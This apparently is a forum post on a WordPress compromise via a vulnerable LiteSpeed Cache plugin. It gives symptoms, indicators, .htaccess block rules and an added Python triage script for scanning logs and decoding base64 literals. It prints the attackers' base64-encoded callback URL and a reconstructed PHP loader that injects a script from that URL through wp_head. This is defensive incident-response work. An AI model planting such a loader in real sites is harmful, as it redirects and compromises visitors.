Good morning, I suddenly found administrator users on my WordPress site and a plugin called wp-cleansong that I never installed. The site redirects when I browse it. How can I solve it?
I'll leave you the details about this hack:
Vulnerable plugin: litespeed-cache (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
Affected version: <= 5.7. Patched version: 5.7.0.1
You can quickly check at wp-content/plugins/litespeed-cache/readme.txt
Symptoms:
Creation of admin users
Redirects generated by JS hooked into wp_head via the clean_header() function
Infected core files like wp-blog-header.php
Execution:
Attackers can inject arbitrary web scripts into pages that will run when an administrator logs in for the first time in wp-admin. The plugin will in fact be created at exactly the same date and time as the login, as you can see from the access.log. plane.php points to a base64 URL: base64_decode("aHR0cHM6Ly9kbnMuc3RhcnRzZXJ2aWNlZm91bmRzLmNvbS9zZXJ2aWNlL2YucGhw"), which points to hxxps://dns[.]startserv**founds[.]com/service/f.php (blacklisted URL).
Sources:
https://www.risorsainformatica.com/rimozione-malware-sito-wordpress/
Malware removal performed on over 1500 websites, of which 30 with this specific attack.
Notes: First detected on February 27, 2024
Prevention: update to the latest version of the LiteSpeed Cache plugin
HTTP(S) monitoring for /plugins/wp-cleansong/plane.php
Block the requests to song and song1 using .htaccess:
# Reject (403) any request whose query string contains song1 or song2, case-insensitive ([NC])
RewriteEngine On
RewriteCond %{QUERY_STRING} song1 [NC,OR]
RewriteCond %{QUERY_STRING} song2 [NC]
RewriteRule ^ - [F]
You can also block plane.php, wp-cleansong.php and song.php.
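The two triage checks the post recommends, as an added example that is not the poster's script and not anything shipped by LiteSpeed or WordPress: scan access.log for requests into the wp-cleansong plugin directory, the dropped files, and the song1/song2 query strings the .htaccess rules reject, and decode base64_decode("...") string literals in a suspect PHP file so the hidden callback URL is visible (printed defanged). The log lines and the PHP loader are constructed samples shaped like the post's description, not real captures; the base64 string is the one quoted in the post, and the assumption that clean_header() is registered with add_action('wp_head', 'clean_header') is mine.

```python
"""Triage checks for the wp-cleansong / litespeed-cache compromise described in the post.

Added example, not the poster's code. Sample inputs below are constructed.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Indicators named in the post.
SUSPICIOUS_DIR = "/wp-cleansong/"
SUSPICIOUS_FILES = ("plane.php", "wp-cleansong.php", "song.php")
SUSPICIOUS_QUERY_KEYS = ("song1", "song2")  # same substrings the .htaccess RewriteCond rules reject

# Combined log format: ip ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
B64_LITERAL_RE = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
# Assumed registration form for the hook the post describes (not confirmed by the post).
HOOK_RE = re.compile(r'add_action\(\s*["\']wp_head["\']\s*,\s*["\']clean_header["\']')


@dataclass
class LogHit:
    ip: str
    time: str
    method: str
    target: str
    status: int
    reason: str


def classify_request(target: str) -> list[str]:
    """Reasons a request target matches the post's indicators; empty list if clean."""
    path, _, query = target.partition("?")
    lower_path = path.lower()  # the post writes the loader as both plane.php and Plane.php
    basename = lower_path.rsplit("/", 1)[-1]
    reasons = []
    if SUSPICIOUS_DIR in lower_path:
        reasons.append("request into the wp-cleansong plugin directory")
    elif basename in SUSPICIOUS_FILES:
        reasons.append(f"request for dropped file {basename}")
    # Substring match, case-insensitive, mirroring RewriteCond %{QUERY_STRING} song1 [NC]
    for key in SUSPICIOUS_QUERY_KEYS:
        if key in query.lower():
            reasons.append(f"query string contains {key}")
    return reasons


def scan_access_log(lines) -> list[LogHit]:
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = classify_request(m.group("target"))
        if reasons:
            hits.append(LogHit(m.group("ip"), m.group("time"), m.group("method"),
                               m.group("target"), int(m.group("status")), "; ".join(reasons)))
    return hits


def defang(url: str) -> str:
    """hxxps://host[.]tld/path so the callback URL is not clickable in a report."""
    parts = urlsplit(url)
    return f"hxxp{parts.scheme[4:]}://{parts.netloc.replace('.', '[.]')}{parts.path}"


@dataclass
class PhpFindings:
    hooks_clean_header: bool
    decoded_literals: list[str] = field(default_factory=list)


def scan_php_source(src: str) -> PhpFindings:
    """Flag the wp_head hook and decode every base64_decode("...") literal in a PHP file."""
    findings = PhpFindings(hooks_clean_header=bool(HOOK_RE.search(src)))
    for literal in B64_LITERAL_RE.findall(src):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("utf-8", "replace")
        except binascii.Error:
            continue  # not valid base64; nothing to show
        is_url = decoded.startswith(("http://", "https://"))
        findings.decoded_literals.append(defang(decoded) if is_url else decoded)
    return findings


# Constructed sample log (combined format); dates echo the post's first-seen date.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Feb/2024:03:14:07 +0000] "GET /wp-content/plugins/wp-cleansong/plane.php?song1=1 HTTP/1.1" 200 512
203.0.113.5 - - [27/Feb/2024:03:14:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0
198.51.100.7 - - [27/Feb/2024:03:15:00 +0000] "GET /index.php?s=SONG2 HTTP/1.1" 200 8192
192.0.2.9 - - [27/Feb/2024:03:16:00 +0000] "GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1" 200 2048
"""

# Constructed loader in the shape the post describes; base64 string copied from the post.
SAMPLE_LOADER = r'''<?php
add_action('wp_head', 'clean_header');
function clean_header() {
    $u = base64_decode("aHR0cHM6Ly9kbnMuc3RhcnRzZXJ2aWNlZm91bmRzLmNvbS9zZXJ2aWNlL2YucGhw");
    echo '<script src="' . $u . '"></script>';
}
'''

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{hit.time} {hit.ip} {hit.method} {hit.target} -> {hit.reason}")
    found = scan_php_source(SAMPLE_LOADER)
    print("clean_header hooked to wp_head:", found.hooks_clean_header)
    for s in found.decoded_literals:
        print("base64_decode literal resolves to:", s)
```

Run it against a real access.log with `scan_access_log(open("access.log"))` and against `wp-content/plugins/wp-cleansong/plane.php` with `scan_php_source(open(path).read())`; the legitimate readme.txt version check from the post is deliberately in the sample so you can see it is not flagged.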